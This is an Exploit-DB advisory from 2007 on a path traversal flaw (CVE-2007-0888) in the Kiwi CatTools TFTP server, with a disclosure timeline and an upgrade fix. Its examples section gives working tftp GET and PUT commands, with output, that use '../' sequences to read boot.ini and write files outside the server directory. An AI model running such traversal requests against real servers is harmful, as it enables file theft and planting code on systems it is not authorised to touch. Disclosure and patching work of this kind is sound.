Kiwi CatTools TFTP <= 3.2.8 - Remote Path Traversal Vulnerability

2007-02-27T00:00:00
ID EDB-ID:3380
Type exploitdb
Reporter Sergey Gordeychik
Modified 2007-02-27T00:00:00

Description

Kiwi CatTools TFTP <= 3.2.8 Remote Path Traversal Vulnerability. CVE-2007-0888. Remote exploit for windows platform

                                        
                                            Path traversal security vulnerability in Kiwi CatTools TFTP up to 3.2.8 
server can lead to information disclosure and remote code execution 

Risk: High 

DISCUSSION 

Kiwi CatTools TFTP server doesn.t properly verify filename in PUT and 
GET request which can be used to download/upload any file from/to 
server. Default setting allows replacing of existing files. Such 
settings lead to probability to replace an executable files and run code 
on attacker choice. 

EXAMPLES 

C:\&gt;tftp -i 10.1.1.2 GET /x/../../../../../boot.ini boot.txt 

Transfer successful: 212 bytes in 1 second, 212 bytes/s 

C:\&gt;type boot.txt 

[boot loader] timeout=30 
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS 

C:\&gt;tftp -i 10.1.1.2 PUT boot.txt /x/../../../../../pttest.txt 

Transfer successful: 212 bytes in 1 second, 212 bytes/s 

C:\&gt;type pttest.txt 

[boot loader] timeout=30 
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS 

C:\&gt; 

SOLUTION 

Upgrade to CatTools 3.2.9 which is available for download at 
http://www.kiwisyslog.com/downloads.php 

CREDITS 

Sergey Gordeychik of Positive Technologies (www.ptsecurity.com) 

DISCLOSURE TIMELINE 

Vulnerability discovered: 11/20/2006 

Initial vendor contact: 12/08/2006 

Patch released: 02/13/2007 

Public disclosure: 02/27/2007 

# milw0rm.com [2007-02-27]